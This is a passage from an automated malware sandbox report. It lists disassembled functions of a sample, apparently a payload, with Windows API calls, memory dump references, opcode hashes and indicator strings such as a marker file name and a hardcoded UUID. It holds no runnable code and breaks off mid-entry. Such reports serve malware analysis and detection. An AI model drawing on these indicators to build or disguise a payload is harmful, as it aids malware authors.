                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: 2a18fc3a0d9646f047bd2b68ae150b92984e20bff4fbb5bf75655ab88f3797b3
                                                                                                                                                                        • Instruction ID: c9b6ec89818a90eecae5fe9cdd3fe292625cdfa295356ba5f7e67fd76a0ffea6
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a18fc3a0d9646f047bd2b68ae150b92984e20bff4fbb5bf75655ab88f3797b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D11C632516615ABCB2B2F74EC54BAE7B9CAF4D360F110525F8559E1D2DB3098808A90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FF070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 002FF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 002FF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: cc5d19c4e475b5d4ed13b5edecc748b4f85c5ba2063eb250a094548b6979936b
                                                                                                                                                                        • Instruction ID: d1381016a291b563224c558ea34ef9ac4ddd6cd4c713bc4c6c97285fdbab28d8
                                                                                                                                                                        • Opcode Fuzzy Hash: cc5d19c4e475b5d4ed13b5edecc748b4f85c5ba2063eb250a094548b6979936b
                                                                                                                                                                        • Instruction Fuzzy Hash: E501DB3579030D7AEB329B54EC46FB6776CEB44B00F104025FB00AB1D2D7B5A505CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FE500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 002FE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 002FE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: d974d206a0bf32f3335fc12c4e67915c9156c3fdc75ba8dfb422d6966d32664f
                                                                                                                                                                        • Instruction ID: d4d787d56affd7f5fe60a58abe404541d94f8c806ff08b9320af51eab7427cc6
                                                                                                                                                                        • Opcode Fuzzy Hash: d974d206a0bf32f3335fc12c4e67915c9156c3fdc75ba8dfb422d6966d32664f
                                                                                                                                                                        • Instruction Fuzzy Hash: DB01DB3575030D7AEF229B50DC46FB67B6CEB44B04F544411FB00AB1E1D6F5A505C794
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FFA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 002FFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 002FFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction ID: 6761ff541590db6558fb184c13c49f9c0ed71cef3a06bbf76c3dbd77795a8d95
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction Fuzzy Hash: E701D631B9030DBBEF219B50DD4AFA67B6CAB45B40F104021FB04AE1C1D7E5A8048AA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FFDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 002FFE03
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFE21
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 002FFE2B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FFE39
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 002FFE44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction ID: 552f3a967652e95a4dea4ce6151d1b65661da2669c1b2b6f72c720c8febe1faf
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d1345cc7cc2b76b6e3cb215d16c45519ccc9bca275b968dcd16dc40d70f19cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C018631B9030DBBEF215B55DD4AFA67B6CEB45B40F144061FB00AE1D2D7F5A81586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F7BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 6a7035dcc42a4492a7112bef65573891c97872f64d853ab110bc6ed87b73ab5b
                                                                                                                                                                        • Instruction ID: 2b50d11d58a9f27670d215bf3c36aff5c54b27ceec6053aec8427ff37b41a270
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a7035dcc42a4492a7112bef65573891c97872f64d853ab110bc6ed87b73ab5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6451B53172410D9BDB24CE5CD880A7AF7AAEF85790B24893EFA55CB381C771DC618B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003029A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                                                                        • String ID: /
                                                                                                                                                                        • API String ID: 3115901604-3521864042
                                                                                                                                                                        • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                        • Instruction ID: 613a97f810becdf0b622582aac2217bc56b6e1bf7bbec4d13a0963499bf9f7d1
                                                                                                                                                                        • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0141C631B027069FDF2A8FA9C8A856F77A9BF84360B25812DE805C76C5DF70DD518B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F4160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: c3bad34f8dd0a88900a847d69e4d44c6fd47b8ad2528ee15b6a2cae469207bb2
                                                                                                                                                                        • Instruction ID: a6c6e22f885346edf6309b29e7ff3b7f7b532cb5afa25a896d0346a1c0e12c33
                                                                                                                                                                        • Opcode Fuzzy Hash: c3bad34f8dd0a88900a847d69e4d44c6fd47b8ad2528ee15b6a2cae469207bb2
                                                                                                                                                                        • Instruction Fuzzy Hash: F731BB3132010C9BDB24EE5CD885977F76AEB417907504638FE658B2C5D7B1ED518B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0033AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c$C74
                                                                                                                                                                        • API String ID: 2102423945-3322797900
                                                                                                                                                                        • Opcode ID: bdb2e58c417e23789cbf07004e834be24d0978c3d06cd625a665f47c03c0ea57
                                                                                                                                                                        • Instruction ID: 5fadb2f87c26155e80e7fceb08854aebf4343c04b2df224b6dd05789399b4c43
                                                                                                                                                                        • Opcode Fuzzy Hash: bdb2e58c417e23789cbf07004e834be24d0978c3d06cd625a665f47c03c0ea57
                                                                                                                                                                        • Instruction Fuzzy Hash: 422101B6B447217BE209666CFCD2F56B389EB94B14F00402AF658DB6C1E2A0BC1087D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 002EC5DA
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 002EC5F6
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 002EC640
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 002EC687
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        • Opcode ID: a693f2b5af27d002b43ee6d5ad2d6201c31171b8bca46d6e5299c3889957672c
                                                                                                                                                                        • Instruction ID: ef0a26ed43c7d934a2952bbd1e38b2386ed7e5414e76d36108eee3125fc17441
                                                                                                                                                                        • Opcode Fuzzy Hash: a693f2b5af27d002b43ee6d5ad2d6201c31171b8bca46d6e5299c3889957672c
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F214C711143419BD714DF24D80476BBBECAFC1348F104A2EF4C583290D775D505CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002EC48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 002EC4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: f66b4cde565a39de27e82f410e213bcac3c84dc5ad9185182ffa19747f452a49
                                                                                                                                                                        • Instruction ID: 30b9795576b11dfdcb26e9d633b51497b651bcf535380e40cc739fa60dd47298
                                                                                                                                                                        • Opcode Fuzzy Hash: f66b4cde565a39de27e82f410e213bcac3c84dc5ad9185182ffa19747f452a49
                                                                                                                                                                        • Instruction Fuzzy Hash: B1014E7278032833DD326A946C87FFB775CCF52721F0000A6FE08D61C0D5A5455647D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FBA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002FBA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 002FBA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
